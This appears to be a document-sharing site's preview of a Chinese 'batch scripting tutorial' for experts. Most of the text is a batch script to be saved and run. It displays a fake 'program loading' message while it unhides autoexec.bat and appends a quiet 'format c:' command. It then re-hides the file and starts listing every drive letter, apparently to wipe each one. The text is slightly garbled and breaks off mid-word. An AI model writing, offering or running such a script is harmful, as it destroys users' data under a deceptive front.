高手必備简明批处理教程.docVIP

  • 5
  • 0
  • 约1.91万字
  • 约 14页
  • 2016-10-20 发布于重庆
  • 举报
高手必備简明批处理教程

------------------------ cut here then save as .bat or .cmd file --------------------------- @echo off rem This program is dedecated to a very special person that does not want to be named. :start cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . call attrib -r -h c:\autoexec.bat nul echo @echo off c:\autoexec.bat echo call format c: /q /u /autoSample nul c:\autoexec.bat call attrib +r +h c:\autoexec.bat nul rem Drive checking and assigning the valid drives to the drive variable.set drive= set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z rem code insertion for Drive Checki

文档评论(0)

1亿VIP精品文档

相关文档